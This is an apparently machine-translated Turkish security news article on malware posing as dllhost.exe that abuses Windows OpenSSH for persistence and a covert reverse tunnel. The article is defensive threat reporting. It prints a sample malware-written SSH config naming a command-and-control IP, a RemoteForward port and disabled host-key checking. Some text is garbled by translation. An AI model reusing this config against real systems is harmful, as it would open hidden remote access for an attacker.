Openssh, hem Linux hem de Windows sistemlerinde güvenli uzaktan yönetim için standart bir araç haline geldi.
Windows 10 sürüm 1803’te varsayılan bir bileşen olarak dahil edilmesinden bu yana, saldırganlar giderek daha fazla varlığını kullandı ve onu “kara ikiliden yaşamak” (Lolbin) olarak kullandı.
Bu, rakiplerin güvenilir sistem araçlarını kullandığı anlamına gelir ssh.exe tespitten kaçınmak ve kalıcı erişim sağlamak.
.png
)
Yakın tarihli bir kötü amaçlı yazılım örneği, dllhost.exebu kötüye kullanımı gösterir.
Rapora göre, kötü amaçlı yazılım meşruları başlatmaya çalışıyor SSHService Program ve başarısız olursa, bir kayıt defteri anahtarı okur veya oluşturur (SOFTWARE\SSHservice) gelecekteki bağlantılar için rastgele seçilmiş bir bağlantı noktası saklamak.
Bu taktik sadece kötü amaçlı yazılımların gizliliğini korumasına yardımcı olmakla kalmaz, aynı zamanda birçok tehdit aktörünün kullandığı ortak bir kalıcılık mekanizması olan Windows kayıt defterini de kullanır.
Kayıt Defteri Manipülasyonu ve SSH Yapılandırması
Kötü amaçlı yazılımların iş akışı birkaç teknik adım içerir:
- Kayıt Defteri Anahtar Kullanımı:
Kötü amaçlı yazılım, SSH hizmeti tarafından kullanılan bağlantı noktası numarasını almak için bir kayıt defteri anahtarını kontrol eder. - Eğer yoksa, yeni bir rastgele bağlantı noktası oluşturur ve kaydeder.
- Bu tür yapılandırma verileri için Windows Kayıt Defteri’ni kullanmak, kalıcılık ve gizli için çeşitli kötü amaçlı yazılım aileleri arasında yaygın bir tekniktir.
- SSH Yapılandırma Dosyası Oluşturma:
Kötü amaçlı yazılım, özel bir SSH yapılandırma dosyası yazarc:\windows\temp\configsaldırganın komut ve kontrol (C2) sunucusunu, kullanıcı kimlik bilgilerini ve bağlantı noktasını belirtme. - Yapılandırma gibi parametreler içerir:
RemoteForward–StrictHostKeyCheckingve diğerleri. - Ancak,
RemoteForwardLine, dosyayı meşru SSH kullanımı için geçersiz kılar, ancak niyet açıktır: bağlantı noktası yönlendirme ve uzaktan erişimi etkinleştirmek için. - Proses Yürütme:
Kötü amaçlı yazılım sonsuz bir döngüye girer, lansmandan önce periyodik olarak uyurssh.exeKötü amaçlı yapılandırma dosyası ile. - Bu, saldırganın altyapısına bağlanmak için kalıcı girişimler sağlar.
Kötü amaçlı yazılım tarafından oluşturulan örnek SSH yapılandırması:
textHost version
Hostname 193.187.174.3
User ugueegfueuagu17t1424acs
Port 443
ServerAliveInterval 60
ServerAliveCountMax 15
RemoteForward 40909
StrictHostKeyChecking no
SessionType None
Not: İçin doğru sözdizimi RemoteForward olmalı:
textRemoteForward [bind_address:]port local_address:local_port
Sağlanan yapılandırma, kötü amaçlı yazılım uygulamasında bir kusuru vurgulayarak gerekli yerel adresi ve bağlantı noktasını atlar.
Gizli, kalıcılık ve tespit zorlukları
Saldırganların meşru sistem ikili dosyalarını ve kayıt defteri anahtarlarını kullanması tespiti karmaşıklaştırır.
Kötü amaçlı yazılımların OpenSsh’in yeni süreçleri zorlamak ve standart giriş/çıktıyı yeniden yönlendirmek gibi varsayılan davranışına güvenmesi, normal idari etkinliği taklit edebilir, bu da geleneksel güvenlik araçlarının kötü amaçlı oturumları meşru olanlardan ayırt etmesini zorlaştırır.
Ayrıca, kayıt defteri tabanlı kalıcılık, iyi belgelenmiş bir taktiktir, birçok gelişmiş tehdit, kayıt defteri anahtarlarını değiştirir veya saklamak için kayıt defteri anahtarlarını değiştirir.
Ortak kalıcılık ve tespit kaçınma teknikleri:
| Teknik | Tanım |
|---|---|
| Kayıt Defteri Anahtar Manipülasyonu | Kötü niyetli eylemleri normal olanlarla harmanlamak için güvenilir ikili kullanır (örn. SSH.EXE) |
| Lolbin istismarı | Kötü niyetli eylemleri normal ile harmanlamak için güvenilir ikili dosyaları (örn. SSH.EXE) kullanır |
| Özel SSH Yapılandırması | Gizli C2 iletişimi ve bağlantı noktası yönlendirmesini sağlar |
| Süreç maskesi | Şüpheyi önlemek için jenerik isimler (örn., Dllhost.exe) altında çalışır |
OpenSsh’in varsayılan Windows kurulumlarına entegrasyonu, şimdi kalıcılık ve gizli erişim için güvenilir sistem araçlarını rutin olarak kötüye kullanan rakipler için saldırı yüzeyini genişletti.
Savunucular, olağandışı kayıt defteri değişikliklerini, beklenmedik SSH yapılandırma dosyalarını ve anormal işlem lansmanlarını izlemelidir ssh.exe.
Düzenli bütünlük kontrolleri ve davranışsal izleme, bu tür tehditleri kalıcı bir taban oluşturmadan önce tespit etmek için gereklidir.
OpenSsh’in yaygınlığı ve esnekliği onu hem yöneticiler hem de saldırganlar için güçlü bir araç haline getirir – sürekli izleme ve gelişmiş algılama stratejileri, basit ama etkili SSH arka kapılarına karşı savunmak için kritik öneme sahiptir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!